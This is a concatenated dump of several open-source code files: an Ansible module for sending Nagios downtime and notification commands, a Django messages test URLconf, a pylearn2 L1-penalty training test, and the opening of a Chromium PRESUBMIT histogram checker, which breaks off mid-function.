            module.fail_json(msg='no host specified for action requiring one')
    ######################################################################
    if action == 'downtime':
        # Make sure there's an actual service selected
        if not services:
            module.fail_json(msg='no service selected to set downtime for')
        fail_unless_int_minutes()
    ######################################################################
    if action == 'delete_downtime':
        # Make sure there's an actual service selected
        if not services:
            module.fail_json(msg='no service selected to set downtime for')
    ######################################################################
    if action in ['servicegroup_service_downtime', 'servicegroup_host_downtime']:
        # Make sure there's an actual servicegroup selected
        if not servicegroup:
            module.fail_json(msg='no servicegroup selected to set downtime for')
        fail_unless_int_minutes()
    ##################################################################
    if action in ['enable_alerts', 'disable_alerts']:
        if not services:
            module.fail_json(msg='a service is required when setting alerts')

    if action in ['command']:
        if not command:
            module.fail_json(msg='no command passed for command action')
    ##################################################################
    if not cmdfile:
        module.fail_json(msg='unable to locate nagios.cfg')
    ##################################################################
    ansible_nagios = Nagios(module, **module.params)
    if module.check_mode:
        # In check mode report "changed" without touching the command file.
        module.exit_json(changed=True)
    else:
        ansible_nagios.act()
##################################################################
######################################################################
class Nagios(object):
    """
    Perform common tasks in Nagios related to downtime and
    notifications.

    The complete set of external commands Nagios handles is documented
    on their website:
    http://old.nagios.org/developerinfo/externalcommands/commandlist.php

    Note that in the case of `schedule_svc_downtime`,
    `enable_svc_notifications`, and `disable_svc_notifications`, the
    service argument should be passed as a list.
    """

    def __init__(self, module, **kwargs):
        self.module = module
        self.action = kwargs['action']
        self.author = kwargs['author']
        self.comment = kwargs['comment']
        self.host = kwargs['host']
        self.servicegroup = kwargs['servicegroup']
        self.minutes = int(kwargs['minutes'])
        self.cmdfile = kwargs['cmdfile']
        self.command = kwargs['command']
        # 'host' and 'all' are sentinel values interpreted by act();
        # anything else is a comma-separated list of service descriptions.
        if (kwargs['services'] is None) or (kwargs['services'] == 'host') or (kwargs['services'] == 'all'):
            self.services = kwargs['services']
        else:
            self.services = kwargs['services'].split(',')
        # Every command written to the Nagios command file is recorded here
        # and reported back through exit_json.
        self.command_results = []

    def _now(self):
        """
        The time in seconds since 12:00:00AM Jan 1, 1970
        """
        return int(time.time())

    def _write_command(self, cmd):
        """
        Write the given command to the Nagios command file.

        Returns True on success.  On failure the module exits via
        fail_json, so this never returns a falsy value.  (Bug fix: the
        original returned None implicitly, which made every caller's
        `if nagios_return:` success check take the failure branch.)
        """
        try:
            fp = open(self.cmdfile, 'w')
            fp.write(cmd)
            fp.flush()
            fp.close()
            self.command_results.append(cmd.strip())
            return True
        except IOError:
            self.module.fail_json(msg='unable to write to nagios command file',
                                  cmdfile=self.cmdfile)

    def _fmt_dt_str(self, cmd, host, duration, author=None,
                    comment=None, start=None,
                    svc=None, fixed=1, trigger=0):
        """
        Format an external-command downtime string.

        cmd - Nagios command ID
        host - Host schedule downtime on
        duration - Minutes to schedule downtime for
        author - Name to file the downtime as
        comment - Reason for running this command (upgrade, reboot, etc)
        start - Start of downtime in seconds since 12:00AM Jan 1 1970
                Default is to use the entry time (now)
        svc - Service to schedule downtime for, omit when for host downtime
        fixed - Start now if 1, start when a problem is detected if 0
        trigger - Optional ID of event to start downtime from. Leave as 0 for
                  fixed downtime.

        Syntax: [submitted] COMMAND;<host_name>;[<service_description>]
        <start_time>;<end_time>;<fixed>;<trigger_id>;<duration>;<author>;
        <comment>
        """
        entry_time = self._now()
        if start is None:
            start = entry_time

        hdr = "[%s] %s;%s;" % (entry_time, cmd, host)
        duration_s = (duration * 60)
        end = start + duration_s

        if not author:
            author = self.author
        if not comment:
            comment = self.comment

        if svc is not None:
            dt_args = [svc, str(start), str(end), str(fixed), str(trigger),
                       str(duration_s), author, comment]
        else:
            # Downtime for a host if no svc specified
            dt_args = [str(start), str(end), str(fixed), str(trigger),
                       str(duration_s), author, comment]

        dt_arg_str = ";".join(dt_args)
        dt_str = hdr + dt_arg_str + "\n"
        return dt_str

    def _fmt_dt_del_str(self, cmd, host, svc=None, start=None, comment=None):
        """
        Format an external-command downtime deletion string.

        cmd - Nagios command ID
        host - Host to remove scheduled downtime from
        comment - Reason downtime was added (upgrade, reboot, etc)
        start - Start of downtime in seconds since 12:00AM Jan 1 1970
        svc - Service to remove downtime for, omit to remove all downtime for the host

        Syntax: [submitted] COMMAND;<host_name>;
        [<service_description>];[<start_time>];[<comment>]
        """
        entry_time = self._now()
        hdr = "[%s] %s;%s;" % (entry_time, cmd, host)

        if comment is None:
            comment = self.comment

        dt_del_args = []
        if svc is not None:
            dt_del_args.append(svc)
        else:
            dt_del_args.append('')

        if start is not None:
            dt_del_args.append(str(start))
        else:
            dt_del_args.append('')

        # comment is never None at this point (defaulted above).
        dt_del_args.append(comment)

        dt_del_arg_str = ";".join(dt_del_args)
        dt_del_str = hdr + dt_del_arg_str + "\n"
        return dt_del_str

    def _fmt_notif_str(self, cmd, host=None, svc=None):
        """
        Format an external-command notification string.

        cmd - Nagios command ID.
        host - Host to en/disable notifications on. A value is not required
               for global downtime
        svc - Service to schedule downtime for. A value is not required
              for host downtime.

        Syntax: [submitted] COMMAND;<host_name>[;<service_description>]
        """
        entry_time = self._now()
        notif_str = "[%s] %s" % (entry_time, cmd)
        if host is not None:
            notif_str += ";%s" % host
            if svc is not None:
                notif_str += ";%s" % svc
        notif_str += "\n"
        return notif_str

    def schedule_svc_downtime(self, host, services=None, minutes=30):
        """
        This command is used to schedule downtime for a particular
        service.  During the specified downtime, Nagios will not send
        notifications out about the service.

        Syntax: SCHEDULE_SVC_DOWNTIME;<host_name>;<service_description>
        <start_time>;<end_time>;<fixed>;<trigger_id>;<duration>;<author>;
        <comment>
        """
        cmd = "SCHEDULE_SVC_DOWNTIME"
        if services is None:
            services = []
        for service in services:
            dt_cmd_str = self._fmt_dt_str(cmd, host, minutes, svc=service)
            self._write_command(dt_cmd_str)

    def schedule_host_downtime(self, host, minutes=30):
        """
        This command is used to schedule downtime for a particular
        host.  During the specified downtime, Nagios will not send
        notifications out about the host.

        Syntax: SCHEDULE_HOST_DOWNTIME;<host_name>;<start_time>;<end_time>;
        <fixed>;<trigger_id>;<duration>;<author>;<comment>
        """
        cmd = "SCHEDULE_HOST_DOWNTIME"
        dt_cmd_str = self._fmt_dt_str(cmd, host, minutes)
        self._write_command(dt_cmd_str)

    def schedule_host_svc_downtime(self, host, minutes=30):
        """
        This command is used to schedule downtime for
        all services associated with a particular host.  During the
        specified downtime, Nagios will not send notifications out
        about the host.

        SCHEDULE_HOST_SVC_DOWNTIME;<host_name>;<start_time>;<end_time>;
        <fixed>;<trigger_id>;<duration>;<author>;<comment>
        """
        cmd = "SCHEDULE_HOST_SVC_DOWNTIME"
        dt_cmd_str = self._fmt_dt_str(cmd, host, minutes)
        self._write_command(dt_cmd_str)

    def delete_host_downtime(self, host, services=None, comment=None):
        """
        This command is used to remove scheduled downtime for a particular
        host.

        Syntax: DEL_DOWNTIME_BY_HOST_NAME;<host_name>;
        [<service_description>];[<start_time>];[<comment>]
        """
        cmd = "DEL_DOWNTIME_BY_HOST_NAME"

        if services is None:
            dt_del_cmd_str = self._fmt_dt_del_str(cmd, host, comment=comment)
            self._write_command(dt_del_cmd_str)
        else:
            for service in services:
                dt_del_cmd_str = self._fmt_dt_del_str(cmd, host, svc=service, comment=comment)
                self._write_command(dt_del_cmd_str)

    def schedule_hostgroup_host_downtime(self, hostgroup, minutes=30):
        """
        This command is used to schedule downtime for all hosts in a
        particular hostgroup.  During the specified downtime, Nagios
        will not send notifications out about the hosts.

        Syntax: SCHEDULE_HOSTGROUP_HOST_DOWNTIME;<hostgroup_name>;<start_time>;
        <end_time>;<fixed>;<trigger_id>;<duration>;<author>;<comment>
        """
        cmd = "SCHEDULE_HOSTGROUP_HOST_DOWNTIME"
        dt_cmd_str = self._fmt_dt_str(cmd, hostgroup, minutes)
        self._write_command(dt_cmd_str)

    def schedule_hostgroup_svc_downtime(self, hostgroup, minutes=30):
        """
        This command is used to schedule downtime for all services in
        a particular hostgroup.  During the specified downtime, Nagios
        will not send notifications out about the services.

        Note that scheduling downtime for services does not
        automatically schedule downtime for the hosts those services
        are associated with.

        Syntax: SCHEDULE_HOSTGROUP_SVC_DOWNTIME;<hostgroup_name>;<start_time>;
        <end_time>;<fixed>;<trigger_id>;<duration>;<author>;<comment>
        """
        cmd = "SCHEDULE_HOSTGROUP_SVC_DOWNTIME"
        dt_cmd_str = self._fmt_dt_str(cmd, hostgroup, minutes)
        self._write_command(dt_cmd_str)

    def schedule_servicegroup_host_downtime(self, servicegroup, minutes=30):
        """
        This command is used to schedule downtime for all hosts in a
        particular servicegroup.  During the specified downtime, Nagios
        will not send notifications out about the hosts.

        Syntax: SCHEDULE_SERVICEGROUP_HOST_DOWNTIME;<servicegroup_name>;
        <start_time>;<end_time>;<fixed>;<trigger_id>;<duration>;<author>;
        <comment>
        """
        cmd = "SCHEDULE_SERVICEGROUP_HOST_DOWNTIME"
        dt_cmd_str = self._fmt_dt_str(cmd, servicegroup, minutes)
        self._write_command(dt_cmd_str)

    def schedule_servicegroup_svc_downtime(self, servicegroup, minutes=30):
        """
        This command is used to schedule downtime for all services in
        a particular servicegroup.  During the specified downtime,
        Nagios will not send notifications out about the services.

        Note that scheduling downtime for services does not
        automatically schedule downtime for the hosts those services
        are associated with.

        Syntax: SCHEDULE_SERVICEGROUP_SVC_DOWNTIME;<servicegroup_name>;
        <start_time>;<end_time>;<fixed>;<trigger_id>;<duration>;<author>;
        <comment>
        """
        cmd = "SCHEDULE_SERVICEGROUP_SVC_DOWNTIME"
        dt_cmd_str = self._fmt_dt_str(cmd, servicegroup, minutes)
        self._write_command(dt_cmd_str)

    def disable_host_svc_notifications(self, host):
        """
        This command is used to prevent notifications from being sent
        out for all services on the specified host.

        Note that this command does not disable notifications from
        being sent out about the host.

        Syntax: DISABLE_HOST_SVC_NOTIFICATIONS;<host_name>
        """
        cmd = "DISABLE_HOST_SVC_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, host)
        self._write_command(notif_str)

    def disable_host_notifications(self, host):
        """
        This command is used to prevent notifications from being sent
        out for the specified host.

        Note that this command does not disable notifications for
        services associated with this host.

        Syntax: DISABLE_HOST_NOTIFICATIONS;<host_name>
        """
        cmd = "DISABLE_HOST_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, host)
        self._write_command(notif_str)

    def disable_svc_notifications(self, host, services=None):
        """
        This command is used to prevent notifications from being sent
        out for the specified service.

        Note that this command does not disable notifications from
        being sent out about the host.

        Syntax: DISABLE_SVC_NOTIFICATIONS;<host_name>;<service_description>
        """
        cmd = "DISABLE_SVC_NOTIFICATIONS"
        if services is None:
            services = []
        for service in services:
            notif_str = self._fmt_notif_str(cmd, host, svc=service)
            self._write_command(notif_str)

    def disable_servicegroup_host_notifications(self, servicegroup):
        """
        This command is used to prevent notifications from being sent
        out for all hosts in the specified servicegroup.

        Note that this command does not disable notifications for
        services associated with hosts in this service group.

        Syntax: DISABLE_SERVICEGROUP_HOST_NOTIFICATIONS;<servicegroup_name>
        """
        cmd = "DISABLE_SERVICEGROUP_HOST_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, servicegroup)
        self._write_command(notif_str)

    def disable_servicegroup_svc_notifications(self, servicegroup):
        """
        This command is used to prevent notifications from being sent
        out for all services in the specified servicegroup.

        Note that this does not prevent notifications from being sent
        out about the hosts in this servicegroup.

        Syntax: DISABLE_SERVICEGROUP_SVC_NOTIFICATIONS;<servicegroup_name>
        """
        cmd = "DISABLE_SERVICEGROUP_SVC_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, servicegroup)
        self._write_command(notif_str)

    def disable_hostgroup_host_notifications(self, hostgroup):
        """
        Disables notifications for all hosts in a particular
        hostgroup.

        Note that this does not disable notifications for the services
        associated with the hosts in the hostgroup - see the
        DISABLE_HOSTGROUP_SVC_NOTIFICATIONS command for that.

        Syntax: DISABLE_HOSTGROUP_HOST_NOTIFICATIONS;<hostgroup_name>
        """
        cmd = "DISABLE_HOSTGROUP_HOST_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, hostgroup)
        self._write_command(notif_str)

    def disable_hostgroup_svc_notifications(self, hostgroup):
        """
        Disables notifications for all services associated with hosts
        in a particular hostgroup.

        Note that this does not disable notifications for the hosts in
        the hostgroup - see the DISABLE_HOSTGROUP_HOST_NOTIFICATIONS
        command for that.

        Syntax: DISABLE_HOSTGROUP_SVC_NOTIFICATIONS;<hostgroup_name>
        """
        cmd = "DISABLE_HOSTGROUP_SVC_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, hostgroup)
        self._write_command(notif_str)

    def enable_host_notifications(self, host):
        """
        Enables notifications for a particular host.

        Note that this command does not enable notifications for
        services associated with this host.

        Syntax: ENABLE_HOST_NOTIFICATIONS;<host_name>
        """
        cmd = "ENABLE_HOST_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, host)
        self._write_command(notif_str)

    def enable_host_svc_notifications(self, host):
        """
        Enables notifications for all services on the specified host.

        Note that this does not enable notifications for the host.

        Syntax: ENABLE_HOST_SVC_NOTIFICATIONS;<host_name>
        """
        cmd = "ENABLE_HOST_SVC_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, host)
        # _write_command returns True on success (or exits the module), so
        # this now correctly reports the submitted command string.
        nagios_return = self._write_command(notif_str)
        if nagios_return:
            return notif_str
        else:
            return "Fail: could not write to the command file"

    def enable_svc_notifications(self, host, services=None):
        """
        Enables notifications for a particular service.

        Note that this does not enable notifications for the host.

        Syntax: ENABLE_SVC_NOTIFICATIONS;<host_name>;<service_description>
        """
        cmd = "ENABLE_SVC_NOTIFICATIONS"
        if services is None:
            services = []
        nagios_return = True
        return_str_list = []
        for service in services:
            notif_str = self._fmt_notif_str(cmd, host, svc=service)
            nagios_return = self._write_command(notif_str) and nagios_return
            return_str_list.append(notif_str)
        if nagios_return:
            return return_str_list
        else:
            return "Fail: could not write to the command file"

    def enable_hostgroup_host_notifications(self, hostgroup):
        """
        Enables notifications for all hosts in a particular hostgroup.

        Note that this command does not enable notifications for
        services associated with the hosts in this hostgroup.

        Syntax: ENABLE_HOSTGROUP_HOST_NOTIFICATIONS;<hostgroup_name>
        """
        cmd = "ENABLE_HOSTGROUP_HOST_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, hostgroup)
        nagios_return = self._write_command(notif_str)
        if nagios_return:
            return notif_str
        else:
            return "Fail: could not write to the command file"

    def enable_hostgroup_svc_notifications(self, hostgroup):
        """
        Enables notifications for all services that are associated
        with hosts in a particular hostgroup.

        Note that this does not enable notifications for the hosts in
        this hostgroup.

        Syntax: ENABLE_HOSTGROUP_SVC_NOTIFICATIONS;<hostgroup_name>
        """
        cmd = "ENABLE_HOSTGROUP_SVC_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, hostgroup)
        nagios_return = self._write_command(notif_str)
        if nagios_return:
            return notif_str
        else:
            return "Fail: could not write to the command file"

    def enable_servicegroup_host_notifications(self, servicegroup):
        """
        Enables notifications for all hosts that have services that
        are members of a particular servicegroup.

        Note that this command does not enable notifications for
        services associated with the hosts in this servicegroup.

        Syntax: ENABLE_SERVICEGROUP_HOST_NOTIFICATIONS;<servicegroup_name>
        """
        cmd = "ENABLE_SERVICEGROUP_HOST_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, servicegroup)
        nagios_return = self._write_command(notif_str)
        if nagios_return:
            return notif_str
        else:
            return "Fail: could not write to the command file"

    def enable_servicegroup_svc_notifications(self, servicegroup):
        """
        Enables notifications for all services that are members of a
        particular servicegroup.

        Note that this does not enable notifications for the hosts in
        this servicegroup.

        Syntax: ENABLE_SERVICEGROUP_SVC_NOTIFICATIONS;<servicegroup_name>
        """
        cmd = "ENABLE_SERVICEGROUP_SVC_NOTIFICATIONS"
        notif_str = self._fmt_notif_str(cmd, servicegroup)
        nagios_return = self._write_command(notif_str)
        if nagios_return:
            return notif_str
        else:
            return "Fail: could not write to the command file"

    def silence_host(self, host):
        """
        This command is used to prevent notifications from being sent
        out for the host and all services on the specified host.

        This is equivalent to calling disable_host_svc_notifications
        and disable_host_notifications.

        Syntax: DISABLE_HOST_SVC_NOTIFICATIONS;<host_name>
        Syntax: DISABLE_HOST_NOTIFICATIONS;<host_name>
        """
        cmd = [
            "DISABLE_HOST_SVC_NOTIFICATIONS",
            "DISABLE_HOST_NOTIFICATIONS"
        ]
        nagios_return = True
        return_str_list = []
        for c in cmd:
            notif_str = self._fmt_notif_str(c, host)
            nagios_return = self._write_command(notif_str) and nagios_return
            return_str_list.append(notif_str)
        if nagios_return:
            return return_str_list
        else:
            return "Fail: could not write to the command file"

    def unsilence_host(self, host):
        """
        This command is used to enable notifications for the host and
        all services on the specified host.

        This is equivalent to calling enable_host_svc_notifications
        and enable_host_notifications.

        Syntax: ENABLE_HOST_SVC_NOTIFICATIONS;<host_name>
        Syntax: ENABLE_HOST_NOTIFICATIONS;<host_name>
        """
        cmd = [
            "ENABLE_HOST_SVC_NOTIFICATIONS",
            "ENABLE_HOST_NOTIFICATIONS"
        ]
        nagios_return = True
        return_str_list = []
        for c in cmd:
            notif_str = self._fmt_notif_str(c, host)
            nagios_return = self._write_command(notif_str) and nagios_return
            return_str_list.append(notif_str)
        if nagios_return:
            return return_str_list
        else:
            return "Fail: could not write to the command file"

    def silence_nagios(self):
        """
        This command is used to disable notifications for all hosts and services
        in nagios.

        This is a 'SHUT UP, NAGIOS' command
        """
        cmd = 'DISABLE_NOTIFICATIONS'
        self._write_command(self._fmt_notif_str(cmd))

    def unsilence_nagios(self):
        """
        This command is used to enable notifications for all hosts and services
        in nagios.

        This is an 'OK, NAGIOS, GO' command
        """
        cmd = 'ENABLE_NOTIFICATIONS'
        self._write_command(self._fmt_notif_str(cmd))

    def nagios_cmd(self, cmd):
        """
        This sends an arbitrary command to nagios.

        It prepends the submitted time and appends a \n.
        You just have to provide the properly formatted command.
        """
        pre = '[%s]' % int(time.time())
        post = '\n'
        cmdstr = '%s %s%s' % (pre, cmd, post)
        self._write_command(cmdstr)

    def act(self):
        """
        Figure out what you want to do from ansible, and then do the
        needful (at the earliest).
        """
        # host or service downtime?
        if self.action == 'downtime':
            if self.services == 'host':
                self.schedule_host_downtime(self.host, self.minutes)
            elif self.services == 'all':
                self.schedule_host_svc_downtime(self.host, self.minutes)
            else:
                self.schedule_svc_downtime(self.host,
                                           services=self.services,
                                           minutes=self.minutes)
        elif self.action == 'delete_downtime':
            if self.services == 'host':
                self.delete_host_downtime(self.host)
            elif self.services == 'all':
                self.delete_host_downtime(self.host, comment='')
            else:
                self.delete_host_downtime(self.host, services=self.services)
        elif self.action == "servicegroup_host_downtime":
            if self.servicegroup:
                self.schedule_servicegroup_host_downtime(
                    servicegroup=self.servicegroup, minutes=self.minutes)
        elif self.action == "servicegroup_service_downtime":
            if self.servicegroup:
                self.schedule_servicegroup_svc_downtime(
                    servicegroup=self.servicegroup, minutes=self.minutes)
        # toggle the host AND service alerts
        elif self.action == 'silence':
            self.silence_host(self.host)
        elif self.action == 'unsilence':
            self.unsilence_host(self.host)
        # toggle host/svc alerts
        elif self.action == 'enable_alerts':
            if self.services == 'host':
                self.enable_host_notifications(self.host)
            elif self.services == 'all':
                self.enable_host_svc_notifications(self.host)
            else:
                self.enable_svc_notifications(self.host,
                                              services=self.services)
        elif self.action == 'disable_alerts':
            if self.services == 'host':
                self.disable_host_notifications(self.host)
            elif self.services == 'all':
                self.disable_host_svc_notifications(self.host)
            else:
                self.disable_svc_notifications(self.host,
                                               services=self.services)
        elif self.action == 'silence_nagios':
            self.silence_nagios()
        elif self.action == 'unsilence_nagios':
            self.unsilence_nagios()
        elif self.action == 'command':
            self.nagios_cmd(self.command)
        # wtf?
        else:
            self.module.fail_json(msg="unknown action specified: '%s'" % \
                self.action)
        self.module.exit_json(nagios_commands=self.command_results,
                              changed=True)
######################################################################
# import module snippets
from ansible.module_utils.basic import *
main()
|
gpl-3.0
|
xq262144/hue
|
desktop/core/ext-py/Django-1.6.10/django/contrib/messages/tests/urls.py
|
119
|
2470
|
from django.conf.urls import patterns, url
from django.contrib import messages
from django.core.urlresolvers import reverse
from django import forms
from django.http import HttpResponseRedirect, HttpResponse
from django.template import RequestContext, Template
from django.template.response import TemplateResponse
from django.views.decorators.cache import never_cache
from django.contrib.messages.views import SuccessMessageMixin
from django.views.generic.edit import FormView
# Template rendered by both show views: dumps pending messages as an HTML
# list, attaching each message's tags as the <li> CSS class.
TEMPLATE = """{% if messages %}
<ul class="messages">
{% for message in messages %}
<li{% if message.tags %} class="{{ message.tags }}"{% endif %}>
{{ message }}
</li>
{% endfor %}
</ul>
{% endif %}
"""
@never_cache
def add(request, message_type):
    """Add each POSTed message at the *message_type* level, then redirect
    to the show view."""
    # Deliberately default to None (not False) so that, when unspecified,
    # the messages API's own default for fail_silently is exercised.
    fail_silently = request.POST.get('fail_silently', None)
    add_message = getattr(messages, message_type)
    for message in request.POST.getlist('messages'):
        if fail_silently is None:
            add_message(request, message)
        else:
            add_message(request, message, fail_silently=fail_silently)
    return HttpResponseRedirect(
        reverse('django.contrib.messages.tests.urls.show'))
@never_cache
def add_template_response(request, message_type):
    """Add each POSTed message, then redirect to the TemplateResponse view."""
    add_message = getattr(messages, message_type)
    for message in request.POST.getlist('messages'):
        add_message(request, message)
    target = reverse('django.contrib.messages.tests.urls.show_template_response')
    return HttpResponseRedirect(target)
@never_cache
def show(request):
    """Render the message list with an eagerly rendered HttpResponse."""
    return HttpResponse(Template(TEMPLATE).render(RequestContext(request)))
@never_cache
def show_template_response(request):
    """Render the message list via a lazily rendered TemplateResponse."""
    template = Template(TEMPLATE)
    return TemplateResponse(request, template)
class ContactForm(forms.Form):
    # Minimal form used to exercise SuccessMessageMixin; both fields required.
    name = forms.CharField(required=True)
    slug = forms.SlugField(required=True)
class ContactFormViewWithMsg(SuccessMessageMixin, FormView):
    # FormView that emits an interpolated success message on valid submission.
    # NOTE(review): success_url is assigned the `show` view callable rather
    # than a URL string — presumably resolved by the test harness; verify.
    form_class = ContactForm
    success_url = show
    success_message = "%(name)s was created successfully"
# URLconf wiring the message-adding and message-showing test views together;
# the add views capture the message level from the URL.
urlpatterns = patterns('',
    ('^add/(debug|info|success|warning|error)/$', add),
    url('^add/msg/$', ContactFormViewWithMsg.as_view(), name='add_success_msg'),
    ('^show/$', show),
    ('^template_response/add/(debug|info|success|warning|error)/$', add_template_response),
    ('^template_response/show/$', show_template_response),
)
|
apache-2.0
|
ddboline/pylearn2
|
pylearn2/costs/tests/test_term_1_0_l1_penalty.py
|
33
|
2673
|
"""
Test term_1_0_l1_penalty
"""
import numpy as np
from pylearn2.datasets.dense_design_matrix import DenseDesignMatrix
from pylearn2.models.mlp import MLP, Sigmoid
from pylearn2.train import Train
from pylearn2.training_algorithms.sgd import SGD, ExponentialDecay
from pylearn2.termination_criteria import And, EpochCounter, MonitorBased
from pylearn2.costs.cost import SumOfCosts
from pylearn2.costs.mlp import Default, L1WeightDecay
def create_dataset():
    """
    Create a small fake dataset (20 samples x 3 features) to initiate
    the training.

    Returns (x_train, y_train, x_valid, y_valid): the first 7 samples
    form the training split and the remaining 13 the validation split.
    """
    # Each feature is written one-per-row for readability, then transposed
    # so that rows correspond to samples (20 x 3).  Without the transpose
    # the split below would slice the 3 feature rows as if they were
    # samples, disagreeing with the 20 labels in y.
    x = np.array([[0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0],
                  [11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 11, 12, 13, 14, 15,
                   16, 17, 18, 19, 20],
                  [0.3, 0.1, 0.8, 0.1, 0.2, 0.6, 0.83, 0.45, 0.0, 0.67, 0.3,
                   0.74, 0.8, 0.1, 0.2, 0.46, 0.83, 0.45, 0.0, 0.67]]).T
    y = np.array([0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0,
                  1, 0, 1, 0, 0, 0, 0, 0]).reshape(20, 1)
    x_train = x[:7, :]
    x_valid = x[7:, :]
    y_train = y[:7]
    y_valid = y[7:]
    return x_train, y_train, x_valid, y_valid
def test_correctness():
    """
    Test that the cost function works with float64.

    Builds a tiny two-layer sigmoid MLP and runs one epoch of SGD with a
    summed cost of 0.99 * Default + 0.01 * L1 weight decay, checking that
    training completes without error.
    """
    x_train, y_train, x_valid, y_valid = create_dataset()
    trainset = DenseDesignMatrix(X=np.array(x_train), y=y_train)
    validset = DenseDesignMatrix(X=np.array(x_valid), y=y_valid)
    n_inputs = trainset.X.shape[1]
    n_outputs = 1
    n_hidden = 10
    # Init scale: 4 * sqrt(6 / (fan_in + fan_out)) for each layer.
    hidden_istdev = 4 * (6 / float(n_inputs + n_hidden)) ** 0.5
    output_istdev = 4 * (6 / float(n_hidden + n_outputs)) ** 0.5
    model = MLP(layers=[Sigmoid(dim=n_hidden, layer_name='hidden',
                                istdev=hidden_istdev),
                        Sigmoid(dim=n_outputs, layer_name='output',
                                istdev=output_istdev)],
                nvis=n_inputs, seed=[2013, 9, 16])
    # Stop after one epoch, or earlier if the monitored channel stalls.
    termination_criterion = And([EpochCounter(max_epochs=1),
                                 MonitorBased(prop_decrease=1e-7,
                                              N=2)])
    # Weighted sum: mostly the default cost plus a small L1 penalty term.
    cost = SumOfCosts([(0.99, Default()),
                       (0.01, L1WeightDecay({}))])
    algo = SGD(1e-1,
               update_callbacks=[ExponentialDecay(decay_factor=1.00001,
                                                  min_lr=1e-10)],
               cost=cost,
               monitoring_dataset=validset,
               termination_criterion=termination_criterion,
               monitor_iteration_mode='even_shuffled_sequential',
               batch_size=2)
    train = Train(model=model, dataset=trainset, algorithm=algo)
    train.main_loop()
if __name__ == '__main__':
test_correctness()
|
bsd-3-clause
|
TEAM-Gummy/platform_external_chromium_org
|
chrome/browser/extensions/PRESUBMIT.py
|
57
|
12404
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Chromium presubmit script for src/chrome/browser/extensions.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details on the presubmit API built into gcl.
"""
def GetPreferredTrySlaves():
  """Route changes under this directory to the linux_chromeos trybot."""
  preferred = ['linux_chromeos']
  return preferred
class HistogramValueChecker(object):
"""Verify that changes to "extension_function_histogram_value.h" are valid.
See comments at the top of the "extension_function_histogram_value.h" file
for what are considered valid changes. There are situations where this script
gives false positive warnings, i.e. it warns even though the edit is
legitimate. Since the script warns using prompt warnings, the user can always
choose to continue. The main point is to attract the attention to all
(potentially or not) invalid edits.
"""
# The name of the file we want to check against
LOCAL_PATH = "chrome/browser/extensions/extension_function_histogram_value.h"
# The markers we look for in the above source file as delimiters of the enum
# definition.
ENUM_START_MARKER = "enum HistogramValue {"
ENUM_END_MARKER = " ENUM_BOUNDARY"
  def __init__(self, input_api, output_api):
    """Remember the presubmit API objects and start an empty result list."""
    self.input_api = input_api
    self.output_api = output_api
    # Accumulated PresubmitPromptWarning results, appended by EmitWarning().
    self.results = []
class EnumRange(object):
"""Represents a range of line numbers (1-based)"""
def __init__(self, first_line, last_line):
self.first_line = first_line
self.last_line = last_line
def Count(self):
return self.last_line - self.first_line + 1
def Contains(self, line_num):
return self.first_line <= line_num and line_num <= self.last_line
def LogInfo(self, message):
self.input_api.logging.info(message)
return
def LogDebug(self, message):
self.input_api.logging.debug(message)
return
def ComputeEnumRangeInContents(self, contents):
"""Returns an |EnumRange| object representing the line extent of the
HistogramValue enum members in |contents|. The line numbers are 1-based,
compatible with line numbers returned by AffectedFile.ChangeContents().
|contents| is a list of strings reprenting the lines of a text file.
If either ENUM_START_MARKER or ENUM_END_MARKER cannot be found in
|contents|, returns None and emits detailed warnings about the problem.
"""
first_enum_line = 0
last_enum_line = 0
line_num = 1 # Line numbers are 1-based
for line in contents:
if line.startswith(self.ENUM_START_MARKER):
first_enum_line = line_num + 1
elif line.startswith(self.ENUM_END_MARKER):
last_enum_line = line_num
line_num += 1
if first_enum_line == 0:
self.EmitWarning("The presubmit script could not find the start of the "
"enum definition (\"%s\"). Did the enum definition "
"change?" % self.ENUM_START_MARKER)
return None
if last_enum_line == 0:
self.EmitWarning("The presubmit script could not find the end of the "
"enum definition (\"%s\"). Did the enum definition "
"change?" % self.ENUM_END_MARKER)
return None
if first_enum_line >= last_enum_line:
self.EmitWarning("The presubmit script located the start of the enum "
"definition (\"%s\" at line %d) *after* its end "
"(\"%s\" at line %d). Something is not quite right."
% (self.ENUM_START_MARKER, first_enum_line,
self.ENUM_END_MARKER, last_enum_line))
return None
self.LogInfo("Line extent of |HistogramValue| enum definition: "
"first_line=%d, last_line=%d."
% (first_enum_line, last_enum_line))
return self.EnumRange(first_enum_line, last_enum_line)
  def ComputeEnumRangeInNewFile(self, affected_file):
    # Extent of the enum in the post-change ("new") version of the file.
    return self.ComputeEnumRangeInContents(affected_file.NewContents())
  def GetLongMessage(self):
    # Long explanatory text attached to every warning about this file; the
    # str() wrapper is redundant (the argument is already a str) but kept.
    return str("The file \"%s\" contains the definition of the "
               "|HistogramValue| enum which should be edited in specific ways "
               "only - *** read the comments at the top of the header file ***"
               ". There are changes to the file that may be incorrect and "
               "warrant manual confirmation after review. Note that this "
               "presubmit script can not reliably report the nature of all "
               "types of invalid changes, especially when the diffs are "
               "complex. For example, an invalid deletion may be reported "
               "whereas the change contains a valid rename."
               % self.LOCAL_PATH)
def EmitWarning(self, message, line_number=None, line_text=None):
    """Emits a presubmit prompt warning containing the short message
    |message|. |item| is |LOCAL_PATH| with optional |line_number| and
    |line_text| appended when provided.
    """
    # Build the most specific item string the optional arguments allow.
    if line_number is None:
        item = self.LOCAL_PATH
    elif line_text is None:
